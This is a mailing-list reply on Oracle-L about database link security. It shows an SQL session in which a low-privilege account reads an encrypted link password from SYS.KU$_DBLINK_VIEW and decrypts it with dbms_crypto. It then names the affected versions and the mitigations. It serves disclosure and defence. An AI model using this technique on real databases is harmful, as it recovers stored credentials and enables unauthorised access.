Home -> Mailing Lists -> Oracle-L -> RE: Database Link Security et al

RE: Database Link Security et al

From: <oracle_at_ukcert.org.uk>
Date: Mon, 10 Dec 2012 04:31:10 +0000 (GMT)
Message-ID: <jSCSbl3D.1355113870.6889620.oracle_at_ukcert.org.uk> 






Hi All,



Just to clarify, that restricted access to dbms_crypto on the target
server is not a protection as simply copy the ciphertext to a local DB
where dbms_crypto is executable.



SQL> CREATE USER DBLINKER IDENTIFIED BY LOWSEC;


User created.



SQL> GRANT SELECT_CATALOG_ROLE TO DBLINKER;


Grant succeeded.



SQL> GRANT CREATE SESSION TO DBLINKER;


Grant succeeded.



SQL> CONN DBLINKER/LOWSEC;



Connected.


SQL> SELECT PASSWORDX FROM SYS.KU$_DBLINK_VIEW;


PASSWORDX





058CC531A7BBC08390C066B29CB2E26AF1


SQL> DESC DBMS_CRYPTO;



ERROR:



ORA-04043: object "SYS"."DBMS_CRYPTO" does not exist



copy ciphertext to local db with executable dbms_crypto..



SQL> select


utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr('058CC531A7BBC08390C066B29CB2E26AF1',19)),
4353, (substr('058CC531A7BBC08390C066B29CB
2E26AF1',3,16)))) from dual;



UTL_RAW.CAST_TO_VARCHAR2(DBMS_CRYPTO.DECRYPT((SUBSTR('058CC531A7BBC08390C066B29C





MYPW


The control is restricting access to the ciphertext, and that is open to
SELECT_CATALOG_ROLE in 11.2/10.x though fixed in 11.2.0.3 and 11.2.0.2
with PSU.



Definitely worth making sure that the dblink accounts are min priv'd and
the passwords are not used for other accounts such as SYS.



Keep safe.


Paul

--
www.oraclesecurity.com

On 12/3/2012, "Jeff Chirco" <JChirco_at_innout.com> wrote:



>As a DBA user I get an invalid identifier on dbms_crypto.decrypt and I also can not read sys.link$ or ku$_dblink_view.  But as SYS both work.  I am running 11.2.0.2 EE on Windows

>

>

>-----Original Message-----

>From: oracle-l-bounce_at_freelists.org [mailto:oracle-l-bounce_at_freelists.org] On Behalf Of rjamya

>Sent: Wednesday, November 28, 2012 11:26 AM

>To: mark.powell2_at_hp.com

>Cc: oracle-l_at_freelists.org

>Subject: Re: Database Link Security et al

>

>I was able to read the view as dba user in 11202.

>Raj

>

>

>On Wed, Nov 28, 2012 at 2:16 PM, Powell, Mark <mark.powell2_at_hp.com> wrote:

>

>> I was unable to read the ku$ view as a DBA so if you have to be a

>> sysdba user to read the view how much of a problem is this really?

>>

>>

>

>

>--

>http://www.freelists.org/webpage/oracle-l

>

>

>--

>http://www.freelists.org/webpage/oracle-l

>

>

>

--
http://www.freelists.org/webpage/oracle-l


Received on Mon Dec 10 2012 - 05:31:10 CET












Original text of this message